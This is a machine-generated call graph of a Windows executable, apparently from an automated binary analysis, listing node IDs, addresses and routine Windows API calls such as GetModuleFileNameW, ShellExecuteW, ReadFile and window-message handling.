86680->86684 86684->86570 86687 42e28d 86923 40d200 52 API calls 86687->86923 86690 42e299 GetForegroundWindow ShellExecuteW 86691 42e2c6 86690->86691 86691->86680 86692 40ec00 LoadLibraryA GetProcAddress 86692->86561 86694 40d72e 86693->86694 86695 40ebd6 LoadLibraryA 86693->86695 86694->86561 86694->86692 86695->86694 86696 40ebe7 GetProcAddress 86695->86696 86696->86694 86698 4182e0 86697->86698 86699 4182f3 EnterCriticalSection 86697->86699 86705 418209 86698->86705 86699->86642 86701 4182e6 86701->86699 86732 411924 46 API calls 86701->86732 86704->86644 86706 418215 86705->86706 86707 418225 86706->86707 86708 41823d 86706->86708 86733 418901 46 API calls 86707->86733 86711 416b04 45 API calls 86708->86711 86714 41824b 86708->86714 86710 41822a 86734 418752 46 API calls 86710->86734 86713 418256 86711->86713 86716 41825d 86713->86716 86717 41826c 86713->86717 86714->86701 86715 418231 86735 411682 GetModuleHandleW GetProcAddress ExitProcess 86715->86735 86736 417f77 46 API calls 86716->86736 86718 4182cb 45 API calls 86717->86718 86721 418273 86718->86721 86723 4182a6 86721->86723 86724 41827b InitializeCriticalSectionAndSpinCount 86721->86724 86727 413748 45 API calls 86723->86727 86725 418297 86724->86725 86726 41828b 86724->86726 86738 4182c2 LeaveCriticalSection 86725->86738 86728 413748 45 API calls 86726->86728 86727->86725 86729 418291 86728->86729 86737 417f77 46 API calls 86729->86737 86733->86710 86734->86715 86736->86714 86737->86725 86738->86714 86739->86649 86740->86651 86924 40e6e0 86741->86924 86745 401f41 GetModuleFileNameW 86942 410100 86745->86942 86747 401f5c 86954 410960 86747->86954 86750 401b10 52 API calls 86751 401f81 86750->86751 86752 401980 53 API calls 86751->86752 86753 401f8e 86752->86753 86754 408f40 VariantClear 86753->86754 86755 401f9d 86754->86755 86756 401b10 52 API calls 86755->86756 86757 401fb4 86756->86757 86758 401980 53 API calls 86757->86758 86759 401fc3 86758->86759 86760 401b10 52 API calls 86759->86760 86761 401fd2 86760->86761 86957 40c2c0 86761->86957 86763 401fe1 86764 40bc70 52 API calls 86763->86764 86765 401ff3 86764->86765 86975 401a10 86765->86975 86767 401ffe 86982 4114ab 86767->86982 86770 428b05 86772 401a10 52 API calls 86770->86772 86771 402017 86773 4114ab 58 API calls 86771->86773 86774 428b18 86772->86774 86775 402022 86773->86775 86777 401a10 52 API calls 86774->86777 86775->86774 86776 40202d 86775->86776 86778 4114ab 58 API calls 86776->86778 86779 428b33 86777->86779 86780 402038 86778->86780 86782 428b3b GetModuleFileNameW 86779->86782 86781 402043 86780->86781 86780->86782 86783 4114ab 58 API calls 86781->86783 86784 401a10 52 API calls 86782->86784 86785 40204e 86783->86785 86786 428b6c 86784->86786 86788 428b90 86785->86788 86790 401a10 52 API calls 86785->86790 86803 402092 86785->86803 86787 40e0a0 52 API calls 86786->86787 86789 428b7a 86787->86789 86798 401a10 52 API calls 86788->86798 86791 401a10 52 API calls 86789->86791 86794 402073 86790->86794 86795 428b88 86791->86795 86792 428bc6 86793 4020a3 86793->86792 86796 40e830 53 API calls 86793->86796 86801 401a10 52 API calls 86794->86801 86795->86788 86797 4020bb 86796->86797 86990 40cf00 86797->86990 86806 4020d0 86798->86806 86800 4020c6 86802 408f40 VariantClear 86800->86802 86801->86803 86802->86806 86803->86788 86803->86793 86804 402110 86808 408f40 VariantClear 86804->86808 86805 40cf00 53 API calls 86805->86806 86806->86804 86806->86805 86809 401a10 52 API calls 86806->86809 87003 40e6a0 53 API calls 86806->87003 86810 402120 86808->86810 86809->86806 86810->86655 86812 40f53c 86811->86812 86814 4295c9 86811->86814 87747 410120 86812->87747 86816 4295d9 GetOpenFileNameW 86814->86816 86815 40f545 87751 4102b0 SHGetMalloc 86815->87751 86816->86812 86818 40d5f5 86816->86818 86818->86662 86818->86664 86819 40f54c 87756 410190 GetFullPathNameW 86819->87756 86821 40f559 87767 40f570 86821->87767 87809 402400 86823->87809 86825 40146f 86828 428c29 86825->86828 87818 401500 86825->87818 86827 40147c 86827->86828 87826 40d440 86827->87826 86830 401489 86830->86828 86831 401491 GetFullPathNameW 86830->86831 86832 402160 52 API calls 86831->86832 86833 4014bb 86832->86833 86834 402160 52 API calls 86833->86834 86835 4014c8 86834->86835 86835->86828 86836 402160 52 API calls 86835->86836 86837 4014ee 86836->86837 86837->86662 86839 428361 86838->86839 86840 4103fc LoadImageW RegisterClassExW 86838->86840 87902 44395e EnumResourceNamesW LoadImageW 86839->87902 87901 410490 7 API calls 86840->87901 86843 40d651 86845 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86843->86845 86844 428368 86845->86677 86847 409202 86846->86847 86848 42d7ad 86846->86848 86903 409216 86847->86903 88165 410940 400 API calls 86847->88165 88168 45e737 90 API calls 86848->88168 86851 409386 86852 40939c 86851->86852 88166 40f190 10 API calls 86851->88166 86852->86680 86913 401000 Shell_NotifyIconW 86852->86913 86854 4095b2 86854->86852 86856 4095bf 86854->86856 86855 409253 PeekMessageW 86855->86903 88167 401a50 400 API calls 86856->88167 86857 40d410 VariantClear 86857->86903 86859 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86859->86852 86861 4095f9 86859->86861 86860 42d8cd Sleep 86860->86903 86865 42e158 TranslateMessage DispatchMessageW GetMessageW 86861->86865 86863 42e13b 88186 40d410 VariantClear 86863->88186 86865->86865 86867 42e188 86865->86867 86867->86852 86869 409567 PeekMessageW 86869->86903 86871 44c29d 52 API calls 86911 4094e0 86871->86911 86872 46f3c1 107 API calls 86872->86903 86873 40e0a0 52 API calls 86873->86903 86874 46fdbf 108 API calls 86874->86911 86875 409551 TranslateMessage DispatchMessageW 86875->86869 86877 42dcd2 WaitForSingleObject 86878 42dcf0 GetExitCodeProcess CloseHandle 86877->86878 86877->86903 88175 40d410 VariantClear 86878->88175 86880 42dd3d Sleep 86880->86911 86883 4094cf Sleep 86883->86911 86885 42d94d timeGetTime 88171 465124 53 API calls 86885->88171 86887 408f40 VariantClear 86887->86911 86888 40c620 timeGetTime 86888->86911 86891 42dd89 CloseHandle 86891->86911 86892 47d33e 378 API calls 86892->86903 86894 465124 53 API calls 86894->86911 86895 42de19 GetExitCodeProcess CloseHandle 86895->86911 86898 42de88 Sleep 86898->86903 86903->86851 86903->86855 86903->86857 86903->86860 86903->86863 86903->86869 86903->86872 86903->86873 86903->86875 86903->86877 86903->86880 86903->86883 86903->86885 86903->86892 86904 42e0cc VariantClear 86903->86904 86905 45e737 90 API calls 86903->86905 86906 408f40 VariantClear 86903->86906 86903->86911 87903 4091b0 86903->87903 87961 40afa0 86903->87961 87987 408fc0 86903->87987 88022 408cc0 86903->88022 88036 4096a0 86903->88036 88163 40d150 TranslateAcceleratorW 86903->88163 88164 40d170 IsDialogMessageW GetClassLongW 86903->88164 88169 465124 53 API calls 86903->88169 88170 40c620 timeGetTime 86903->88170 88185 40e270 VariantClear 86903->88185 86904->86903 86905->86903 86906->86903 86908 401980 53 API calls 86908->86911 86909 401b10 52 API calls 86909->86911 86911->86871 86911->86874 86911->86887 86911->86888 86911->86891 86911->86894 86911->86895 86911->86898 86911->86903 86911->86908 86911->86909 88172 45178a 54 API calls 86911->88172 88173 47d33e 400 API calls 86911->88173 88174 453bc6 54 API calls 86911->88174 88176 40d410 VariantClear 86911->88176 88177 443d19 67 API calls 86911->88177 88178 4574b4 VariantClear 86911->88178 88179 403cd0 86911->88179 88183 4731e1 VariantClear 86911->88183 88184 4331a2 6 API calls 86911->88184 86912->86679 86913->86680 86914->86662 86915->86671 86917 401b16 86916->86917 86918 4115d7 52 API calls 86917->86918 86921 401b63 86917->86921 86919 401b4b 86918->86919 86920 4115d7 52 API calls 86919->86920 86920->86921 86922 40d200 52 API calls 86921->86922 86922->86687 86923->86690 86925 40bc70 52 API calls 86924->86925 86926 401f31 86925->86926 86927 402560 86926->86927 86928 40256d 86927->86928 86929 402160 52 API calls 86928->86929 86931 402593 86929->86931 86933 4025bd 86931->86933 87004 401c90 86931->87004 86932 4026f0 52 API calls 86932->86933 86933->86932 86934 4026a7 86933->86934 86937 401b10 52 API calls 86933->86937 86939 401c90 52 API calls 86933->86939 87007 40d7c0 52 API calls 86933->87007 86935 4026db 86934->86935 86936 401b10 52 API calls 86934->86936 86935->86745 86938 4026d1 86936->86938 86937->86933 87008 40d7c0 52 API calls 86938->87008 86939->86933 87009 40f760 86942->87009 86945 410118 86945->86747 86947 42805d 86948 42806a 86947->86948 87065 431e58 86947->87065 86950 413748 46 API calls 86948->86950 86951 428078 86950->86951 86952 431e58 82 API calls 86951->86952 86953 428084 86952->86953 86953->86747 86955 4115d7 52 API calls 86954->86955 86956 401f74 86955->86956 86956->86750 86958 40c2c7 86957->86958 86959 40c30e 86957->86959 86962 40c2d3 86958->86962 86963 426c79 86958->86963 86960 40c315 86959->86960 86961 426c2b 86959->86961 86964 40c321 86960->86964 86970 426c5a 86960->86970 86966 426c4b 86961->86966 86967 426c2e 86961->86967 87734 403ea0 52 API calls 86962->87734 87739 4534e3 52 API calls 86963->87739 87735 403ea0 52 API calls 86964->87735 87737 4534e3 52 API calls 86966->87737 86971 40c2de 86967->86971 87736 4534e3 52 API calls 86967->87736 87738 4534e3 52 API calls 86970->87738 86971->86763 86976 401a30 86975->86976 86978 401a17 86975->86978 86977 402160 52 API calls 86976->86977 86981 401a3d 86977->86981 86979 401a2d 86978->86979 87740 403c30 52 API calls 86978->87740 86979->86767 86981->86767 86983 411523 86982->86983 86984 4114ba 86982->86984 87743 4113a8 58 API calls 86983->87743 86989 40200c 86984->86989 87741 417f77 46 API calls 86984->87741 86987 4114c6 87742 417f25 10 API calls 86987->87742 86989->86770 86989->86771 86991 428ac6 86990->86991 86992 40cf0e 86990->86992 86991->86800 86993 40cf19 86992->86993 87744 40e810 52 API calls 86992->87744 86996 40cf1d 86993->86996 87746 40e950 53 API calls 86993->87746 86997 40cf38 86996->86997 86998 4115d7 52 API calls 86996->86998 86997->86800 86999 40cf88 86998->86999 87000 40cfaa 86999->87000 87745 40d290 52 API calls 86999->87745 87000->86800 87002 40cf96 87002->86800 87003->86806 87005 4026f0 52 API calls 87004->87005 87006 401c97 87005->87006 87006->86931 87007->86933 87008->86935 87069 40f6f0 87009->87069 87011 40f77b 87077 40f850 87011->87077 87016 427c2a 87106 414d04 87016->87106 87018 40f7fc 87018->87016 87019 40f804 87018->87019 87093 414a46 87019->87093 87024 40f80e 87024->86945 87028 4528bd 87024->87028 87025 427c59 87112 414fe2 87025->87112 87027 427c79 87029 4150d1 81 API calls 87028->87029 87030 452930 87029->87030 87636 452719 87030->87636 87033 452948 87033->86947 87034 414d04 61 API calls 87035 452966 87034->87035 87036 414d04 61 API calls 87035->87036 87037 452976 87036->87037 87038 414d04 61 API calls 87037->87038 87039 45298f 87038->87039 87040 414d04 61 API calls 87039->87040 87041 4529aa 87040->87041 87042 4150d1 81 API calls 87041->87042 87043 4529c4 87042->87043 87044 4135bb 46 API calls 87043->87044 87045 4529cf 87044->87045 87046 4135bb 46 API calls 87045->87046 87047 4529db 87046->87047 87048 414d04 61 API calls 87047->87048 87049 4529ec 87048->87049 87050 44afef GetSystemTimeAsFileTime 87049->87050 87051 452a00 87050->87051 87052 452a36 87051->87052 87053 452a13 87051->87053 87054 452aa5 87052->87054 87055 452a3c 87052->87055 87056 413748 46 API calls 87053->87056 87058 413748 46 API calls 87054->87058 87642 44b1a9 87055->87642 87059 452a1c 87056->87059 87061 452aa3 87058->87061 87062 413748 46 API calls 87059->87062 87060 452a9d 87064 413748 46 API calls 87060->87064 87061->86947 87063 452a25 87062->87063 87063->86947 87064->87061 87066 431e64 87065->87066 87067 431e6a 87065->87067 87068 414a46 82 API calls 87066->87068 87067->86948 87068->87067 87070 425de2 87069->87070 87071 40f6fc 87069->87071 87070->87011 87072 40f710 WideCharToMultiByte 87071->87072 87073 40f756 87072->87073 87074 40f728 87072->87074 87073->87011 87075 4115d7 52 API calls 87074->87075 87076 40f735 WideCharToMultiByte 87075->87076 87076->87011 87079 40f85d 87077->87079 87080 40f7ab 87079->87080 87125 414db8 87079->87125 87081 4149c2 87080->87081 87140 414904 87081->87140 87083 40f7e9 87083->87016 87084 40f5c0 87083->87084 87088 40f5cd 87084->87088 87085 414d04 61 API calls 87085->87088 87086 40f691 87086->87018 87088->87085 87088->87086 87092 425d11 87088->87092 87228 4150d1 87088->87228 87089 4150d1 81 API calls 87090 425d33 87089->87090 87091 414d04 61 API calls 87090->87091 87091->87086 87092->87089 87094 414a52 87093->87094 87095 414a64 87094->87095 87096 414a79 87094->87096 87392 417f77 46 API calls 87095->87392 87098 415471 47 API calls 87096->87098 87103 414a74 87096->87103 87101 414a92 87098->87101 87099 414a69 87393 417f25 10 API calls 87099->87393 87376 4149d9 87101->87376 87103->87024 87461 414c76 87106->87461 87108 414d1c 87109 44afef 87108->87109 87629 442c5a 87109->87629 87111 44b00d 87111->87025 87113 414fee 87112->87113 87114 414ffa 87113->87114 87115 41500f 87113->87115 87633 417f77 46 API calls 87114->87633 87117 415471 47 API calls 87115->87117 87118 415017 87117->87118 87120 414e4e 51 API calls 87118->87120 87119 414fff 87634 417f25 10 API calls 87119->87634 87122 415024 87120->87122 87635 41503d LeaveCriticalSection LeaveCriticalSection 87122->87635 87124 41500a 87124->87027 87126 414dd6 87125->87126 87127 414deb 87125->87127 87136 417f77 46 API calls 87126->87136 87127->87126 87129 414df2 87127->87129 87138 41b91b 79 API calls 87129->87138 87130 414ddb 87137 417f25 10 API calls 87130->87137 87133 414e18 87134 414de6 87133->87134 87139 418f98 77 API calls 87133->87139 87134->87079 87136->87130 87137->87134 87138->87133 87139->87134 87142 414910 87140->87142 87141 414923 87196 417f77 46 API calls 87141->87196 87142->87141 87145 414951 87142->87145 87144 414928 87197 417f25 10 API calls 87144->87197 87159 41d4d1 87145->87159 87148 414956 87149 41496a 87148->87149 87150 41495d 87148->87150 87152 414992 87149->87152 87153 414972 87149->87153 87198 417f77 46 API calls 87150->87198 87176 41d218 87152->87176 87199 417f77 46 API calls 87153->87199 87156 414933 87156->87083 87160 41d4dd 87159->87160 87161 4182cb 46 API calls 87160->87161 87173 41d4eb 87161->87173 87162 41d560 87201 41d5fb 87162->87201 87163 41d567 87165 416b04 46 API calls 87163->87165 87167 41d56e 87165->87167 87166 41d5f0 87166->87148 87167->87162 87168 41d57c InitializeCriticalSectionAndSpinCount 87167->87168 87169 41d59c 87168->87169 87170 41d5af EnterCriticalSection 87168->87170 87174 413748 46 API calls 87169->87174 87170->87162 87171 418209 46 API calls 87171->87173 87173->87162 87173->87163 87173->87171 87204 4154b2 47 API calls 87173->87204 87205 415520 LeaveCriticalSection LeaveCriticalSection 87173->87205 87174->87162 87177 41d23a 87176->87177 87178 41d255 87177->87178 87189 41d26c 87177->87189 87210 417f77 46 API calls 87178->87210 87180 41d25a 87211 417f25 10 API calls 87180->87211 87181 41d47a 87215 417f77 46 API calls 87181->87215 87182 41d48c 87207 422bf9 87182->87207 87186 41d47f 87216 417f25 10 API calls 87186->87216 87187 41499d 87200 4149b8 LeaveCriticalSection LeaveCriticalSection 87187->87200 87189->87181 87195 41d421 87189->87195 87212 41341f 58 API calls 87189->87212 87191 41d41a 87191->87195 87213 41341f 58 API calls 87191->87213 87193 41d439 87193->87195 87214 41341f 58 API calls 87193->87214 87195->87181 87195->87182 87196->87144 87197->87156 87198->87156 87199->87156 87200->87156 87206 4181f2 LeaveCriticalSection 87201->87206 87203 41d602 87203->87166 87204->87173 87205->87173 87206->87203 87217 422b35 87207->87217 87209 422c14 87209->87187 87210->87180 87211->87187 87212->87191 87213->87193 87214->87195 87215->87186 87216->87187 87219 422b41 87217->87219 87218 422b54 87220 417f77 46 API calls 87218->87220 87219->87218 87221 422b8a 87219->87221 87222 422b59 87220->87222 87223 422400 109 API calls 87221->87223 87224 417f25 10 API calls 87222->87224 87225 422ba4 87223->87225 87227 422b63 87224->87227 87226 422bcb LeaveCriticalSection 87225->87226 87226->87227 87227->87209 87231 4150dd 87228->87231 87229 4150e9 87259 417f77 46 API calls 87229->87259 87231->87229 87232 41510f 87231->87232 87241 415471 87232->87241 87233 4150ee 87260 417f25 10 API calls 87233->87260 87240 4150f9 87240->87088 87242 415483 87241->87242 87243 4154a5 EnterCriticalSection 87241->87243 87242->87243 87244 41548b 87242->87244 87245 415117 87243->87245 87246 4182cb 46 API calls 87244->87246 87247 415047 87245->87247 87246->87245 87248 415067 87247->87248 87249 415057 87247->87249 87254 415079 87248->87254 87262 414e4e 87248->87262 87317 417f77 46 API calls 87249->87317 87253 41505c 87261 415143 LeaveCriticalSection LeaveCriticalSection 87253->87261 87279 41443c 87254->87279 87257 4150b9 87292 41e1f4 87257->87292 87259->87233 87260->87240 87261->87240 87263 414e61 87262->87263 87264 414e79 87262->87264 87318 417f77 46 API calls 87263->87318 87266 414139 46 API calls 87264->87266 87267 414e80 87266->87267 87270 41e1f4 51 API calls 87267->87270 87268 414e66 87319 417f25 10 API calls 87268->87319 87272 414e97 87270->87272 87271 414e71 87271->87254 87272->87271 87273 414f09 87272->87273 87275 414ec9 87272->87275 87320 417f77 46 API calls 87273->87320 87275->87271 87276 41e1f4 51 API calls 87275->87276 87277 414f64 87276->87277 87277->87271 87278 41e1f4 51 API calls 87277->87278 87278->87271 87280 414477 87279->87280 87281 414455 87279->87281 87285 414139 87280->87285 87281->87280 87282 414139 46 API calls 87281->87282 87283 414470 87282->87283 87321 41b7b2 87283->87321 87286 414145 87285->87286 87287 41415a 87285->87287 87346 417f77 46 API calls 87286->87346 87287->87257 87289 41414a 87347 417f25 10 API calls 87289->87347 87291 414155 87291->87257 87293 41e200 87292->87293 87294 41e223 87293->87294 87295 41e208 87293->87295 87296 41e22f 87294->87296 87301 41e269 87294->87301 87368 417f8a 46 API calls 87295->87368 87370 417f8a 46 API calls 87296->87370 87299 41e20d 87369 417f77 46 API calls 87299->87369 87300 41e234 87371 417f77 46 API calls 87300->87371 87348 41ae56 87301->87348 87305 41e23c 87372 417f25 10 API calls 87305->87372 87306 41e26f 87308 41e291 87306->87308 87309 41e27d 87306->87309 87373 417f77 46 API calls 87308->87373 87358 41e17f 87309->87358 87311 41e215 87311->87253 87313 41e289 87375 41e2c0 LeaveCriticalSection 87313->87375 87314 41e296 87374 417f8a 46 API calls 87314->87374 87317->87253 87318->87268 87319->87271 87320->87271 87322 41b7be 87321->87322 87323 41b7e1 87322->87323 87324 41b7c6 87322->87324 87326 41b7ed 87323->87326 87329 41b827 87323->87329 87325 417f8a 46 API calls 87324->87325 87327 41b7cb 87325->87327 87328 417f8a 46 API calls 87326->87328 87330 417f77 46 API calls 87327->87330 87331 41b7f2 87328->87331 87332 41ae56 48 API calls 87329->87332 87339 41b7d3 87330->87339 87333 417f77 46 API calls 87331->87333 87334 41b82d 87332->87334 87335 41b7fa 87333->87335 87337 41b83b 87334->87337 87338 41b84f 87334->87338 87336 417f25 10 API calls 87335->87336 87336->87339 87340 41b0b5 74 API calls 87337->87340 87341 417f77 46 API calls 87338->87341 87339->87280 87342 41b847 87340->87342 87343 41b854 87341->87343 87345 41b87e LeaveCriticalSection 87342->87345 87344 417f8a 46 API calls 87343->87344 87344->87342 87345->87339 87346->87289 87347->87291 87349 41ae62 87348->87349 87350 41aebc 87349->87350 87352 4182cb 46 API calls 87349->87352 87351 41aec1 EnterCriticalSection 87350->87351 87355 41aede 87350->87355 87351->87355 87353 41ae8e 87352->87353 87354 41ae97 InitializeCriticalSectionAndSpinCount 87353->87354 87356 41aeaa 87353->87356 87354->87356 87355->87306 87357 41aeec LeaveCriticalSection 87356->87357 87357->87350 87359 41aded 46 API calls 87358->87359 87360 41e18e 87359->87360 87361 41e1a4 SetFilePointer 87360->87361 87362 41e194 87360->87362 87364 41e1c3 87361->87364 87365 41e1bb GetLastError 87361->87365 87363 417f77 46 API calls 87362->87363 87366 41e199 87363->87366 87364->87366 87367 417f9d 46 API calls 87364->87367 87365->87364 87366->87313 87367->87366 87368->87299 87369->87311 87370->87300 87371->87305 87372->87311 87373->87314 87374->87313 87375->87311 87377 4149ea 87376->87377 87378 4149fe 87376->87378 87422 417f77 46 API calls 87377->87422 87379 4149fa 87378->87379 87381 41443c 77 API calls 87378->87381 87394 414ab2 LeaveCriticalSection LeaveCriticalSection 87379->87394 87383 414a0a 87381->87383 87382 4149ef 87423 417f25 10 API calls 87382->87423 87395 41d8c2 87383->87395 87387 414139 46 API calls 87388 414a18 87387->87388 87399 41d7fe 87388->87399 87390 414a1e 87390->87379 87391 413748 46 API calls 87390->87391 87391->87379 87392->87099 87393->87103 87394->87103 87396 414a12 87395->87396 87397 41d8d2 87395->87397 87396->87387 87397->87396 87398 413748 46 API calls 87397->87398 87398->87396 87400 41d80a 87399->87400 87401 41d812 87400->87401 87402 41d82d 87400->87402 87439 417f8a 46 API calls 87401->87439 87404 41d839 87402->87404 87407 41d873 87402->87407 87441 417f8a 46 API calls 87404->87441 87405 41d817 87440 417f77 46 API calls 87405->87440 87410 41ae56 48 API calls 87407->87410 87409 41d83e 87442 417f77 46 API calls 87409->87442 87413 41d879 87410->87413 87412 41d846 87443 417f25 10 API calls 87412->87443 87415 41d893 87413->87415 87416 41d887 87413->87416 87444 417f77 46 API calls 87415->87444 87424 41d762 87416->87424 87417 41d81f 87417->87390 87420 41d88d 87445 41d8ba LeaveCriticalSection 87420->87445 87422->87382 87423->87379 87446 41aded 87424->87446 87426 41d7c8 87459 41ad67 47 API calls 87426->87459 87427 41d772 87427->87426 87428 41d7a6 87427->87428 87430 41aded 46 API calls 87427->87430 87428->87426 87431 41aded 46 API calls 87428->87431 87433 41d79d 87430->87433 87434 41d7b2 CloseHandle 87431->87434 87432 41d7d0 87435 41d7f2 87432->87435 87460 417f9d 46 API calls 87432->87460 87436 41aded 46 API calls 87433->87436 87434->87426 87437 41d7be GetLastError 87434->87437 87435->87420 87436->87428 87437->87426 87439->87405 87440->87417 87441->87409 87442->87412 87443->87417 87444->87420 87445->87417 87447 41ae12 87446->87447 87448 41adfa 87446->87448 87451 417f8a 46 API calls 87447->87451 87454 41ae51 87447->87454 87449 417f8a 46 API calls 87448->87449 87450 41adff 87449->87450 87452 417f77 46 API calls 87450->87452 87453 41ae23 87451->87453 87456 41ae07 87452->87456 87455 417f77 46 API calls 87453->87455 87454->87427 87457 41ae2b 87455->87457 87456->87427 87458 417f25 10 API calls 87457->87458 87458->87456 87459->87432 87460->87435 87462 414c82 87461->87462 87463 414cc3 87462->87463 87464 414c96 87462->87464 87465 414cbb 87462->87465 87466 415471 47 API calls 87463->87466 87488 417f77 46 API calls 87464->87488 87465->87108 87468 414ccb 87466->87468 87474 414aba 87468->87474 87469 414cb0 87489 417f25 10 API calls 87469->87489 87475 414af2 87474->87475 87478 414ad8 87474->87478 87490 414cfa LeaveCriticalSection LeaveCriticalSection 87475->87490 87476 414ae2 87541 417f77 46 API calls 87476->87541 87478->87475 87478->87476 87484 414b2d 87478->87484 87481 414c38 87544 417f77 46 API calls 87481->87544 87482 414139 46 API calls 87482->87484 87484->87475 87484->87481 87484->87482 87491 41dfcc 87484->87491 87521 41d8f3 87484->87521 87543 41e0c2 46 API calls 87484->87543 87487 414ae7 87542 417f25 10 API calls 87487->87542 87488->87469 87489->87465 87490->87465 87492 41dfd8 87491->87492 87493 41dfe0 87492->87493 87494 41dffb 87492->87494 87614 417f8a 46 API calls 87493->87614 87495 41e007 87494->87495 87500 41e041 87494->87500 87616 417f8a 46 API calls 87495->87616 87498 41dfe5 87615 417f77 46 API calls 87498->87615 87499 41e00c 87617 417f77 46 API calls 87499->87617 87503 41e063 87500->87503 87504 41e04e 87500->87504 87505 41ae56 48 API calls 87503->87505 87619 417f8a 46 API calls 87504->87619 87508 41e069 87505->87508 87506 41e014 87618 417f25 10 API calls 87506->87618 87512 41e077 87508->87512 87513 41e08b 87508->87513 87509 41e053 87620 417f77 46 API calls 87509->87620 87511 41dfed 87511->87484 87545 41da15 87512->87545 87621 417f77 46 API calls 87513->87621 87517 41e083 87623 41e0ba LeaveCriticalSection 87517->87623 87518 41e090 87622 417f8a 46 API calls 87518->87622 87522 41d900 87521->87522 87525 41d915 87521->87525 87627 417f77 46 API calls 87522->87627 87524 41d905 87628 417f25 10 API calls 87524->87628 87527 41d94a 87525->87527 87534 41d910 87525->87534 87624 420603 87525->87624 87529 414139 46 API calls 87527->87529 87530 41d95e 87529->87530 87531 41dfcc 59 API calls 87530->87531 87532 41d965 87531->87532 87533 414139 46 API calls 87532->87533 87532->87534 87535 41d988 87533->87535 87534->87484 87535->87534 87536 414139 46 API calls 87535->87536 87537 41d994 87536->87537 87537->87534 87538 414139 46 API calls 87537->87538 87539 41d9a1 87538->87539 87540 414139 46 API calls 87539->87540 87540->87534 87541->87487 87542->87475 87543->87484 87544->87487 87546 41da31 87545->87546 87547 41da4c 87545->87547 87549 417f8a 46 API calls 87546->87549 87548 41da5b 87547->87548 87550 41da7a 87547->87550 87551 417f8a 46 API calls 87548->87551 87552 41da36 87549->87552 87554 41da98 87550->87554 87565 41daac 87550->87565 87553 41da60 87551->87553 87555 417f77 46 API calls 87552->87555 87557 417f77 46 API calls 87553->87557 87558 417f8a 46 API calls 87554->87558 87566 41da3e 87555->87566 87556 41db02 87560 417f8a 46 API calls 87556->87560 87559 41da67 87557->87559 87561 41da9d 87558->87561 87562 417f25 10 API calls 87559->87562 87563 41db07 87560->87563 87564 417f77 46 API calls 87561->87564 87562->87566 87567 417f77 46 API calls 87563->87567 87568 41daa4 87564->87568 87565->87556 87565->87566 87569 41dae1 87565->87569 87571 41db1b 87565->87571 87566->87517 87567->87568 87570 417f25 10 API calls 87568->87570 87569->87556 87574 41daec ReadFile 87569->87574 87570->87566 87573 416b04 46 API calls 87571->87573 87575 41db31 87573->87575 87576 41dc17 87574->87576 87577 41df8f GetLastError 87574->87577 87580 41db59 87575->87580 87581 41db3b 87575->87581 87576->87577 87584 41dc2b 87576->87584 87578 41de16 87577->87578 87579 41df9c 87577->87579 87588 417f9d 46 API calls 87578->87588 87593 41dd9b 87578->87593 87582 417f77 46 API calls 87579->87582 87585 420494 48 API calls 87580->87585 87583 417f77 46 API calls 87581->87583 87586 41dfa1 87582->87586 87587 41db40 87583->87587 87584->87593 87594 41dc47 87584->87594 87597 41de5b 87584->87597 87589 41db67 87585->87589 87590 417f8a 46 API calls 87586->87590 87591 417f8a 46 API calls 87587->87591 87588->87593 87589->87574 87590->87593 87591->87566 87592 413748 46 API calls 87592->87566 87593->87566 87593->87592 87595 41dcab ReadFile 87594->87595 87602 41dd28 87594->87602 87600 41dcc9 GetLastError 87595->87600 87605 41dcd3 87595->87605 87596 41ded0 ReadFile 87598 41deef GetLastError 87596->87598 87606 41def9 87596->87606 87597->87593 87597->87596 87598->87597 87598->87606 87599 41ddec MultiByteToWideChar 87599->87593 87601 41de10 GetLastError 87599->87601 87600->87594 87600->87605 87601->87578 87602->87593 87603 41dda3 87602->87603 87604 41dd96 87602->87604 87610 41dd60 87602->87610 87603->87610 87611 41ddda 87603->87611 87607 417f77 46 API calls 87604->87607 87605->87594 87608 420494 48 API calls 87605->87608 87606->87597 87609 420494 48 API calls 87606->87609 87607->87593 87608->87605 87609->87606 87610->87599 87612 420494 48 API calls 87611->87612 87613 41dde9 87612->87613 87613->87599 87614->87498 87615->87511 87616->87499 87617->87506 87618->87511 87619->87509 87620->87506 87621->87518 87622->87517 87623->87511 87625 416b04 46 API calls 87624->87625 87626 420618 87625->87626 87626->87527 87627->87524 87628->87534 87632 4148b3 GetSystemTimeAsFileTime 87629->87632 87631 442c6b 87631->87111 87632->87631 87633->87119 87634->87124 87635->87124 87640 45272f 87636->87640 87637 414d04 61 API calls 87637->87640 87638 44afef GetSystemTimeAsFileTime 87638->87640 87639 4528a4 87639->87033 87639->87034 87640->87637 87640->87638 87640->87639 87641 4150d1 81 API calls 87640->87641 87641->87640 87643 44b1bc 87642->87643 87644 44b1ca 87642->87644 87645 4149c2 116 API calls 87643->87645 87646 44b1e1 87644->87646 87647 44b1d8 87644->87647 87648 4149c2 116 API calls 87644->87648 87645->87644 87677 4321a4 87646->87677 87647->87060 87649 44b2db 87648->87649 87649->87646 87651 44b2e9 87649->87651 87653 44b2f6 87651->87653 87656 414a46 82 API calls 87651->87656 87652 44b224 87654 44b253 87652->87654 87655 44b228 87652->87655 87653->87060 87681 43213d 87654->87681 87658 44b235 87655->87658 87660 414a46 82 API calls 87655->87660 87656->87653 87661 44b245 87658->87661 87662 414a46 82 API calls 87658->87662 87659 44b25a 87663 44b289 87659->87663 87665 44b260 87659->87665 87660->87658 87661->87060 87662->87661 87691 44b0bf 87663->87691 87666 44b26d 87665->87666 87668 414a46 82 API calls 87665->87668 87669 44b27d 87666->87669 87671 414a46 82 API calls 87666->87671 87667 44b28f 87700 4320f8 87667->87700 87668->87666 87669->87060 87671->87669 87673 44b2a2 87675 44b2b2 87673->87675 87676 414a46 82 API calls 87673->87676 87674 414a46 82 API calls 87674->87673 87675->87060 87676->87675 87678 4321cb 87677->87678 87680 4321b4 87677->87680 87679 414d04 61 API calls 87678->87679 87679->87680 87680->87652 87682 4135bb 46 API calls 87681->87682 87683 432150 87682->87683 87684 4135bb 46 API calls 87683->87684 87685 432162 87684->87685 87686 4135bb 46 API calls 87685->87686 87687 432174 87686->87687 87688 4320f8 46 API calls 87687->87688 87689 432189 87687->87689 87690 432198 87688->87690 87689->87659 87690->87659 87692 44b18e 87691->87692 87699 44b0da 87691->87699 87712 43206e 87692->87712 87695 442caf 61 API calls 87695->87699 87698 44b19d 87698->87667 87699->87692 87699->87695 87699->87698 87708 442d48 87699->87708 87716 44b040 61 API calls 87699->87716 87701 432109 87700->87701 87706 43210f 87700->87706 87702 413748 46 API calls 87701->87702 87702->87706 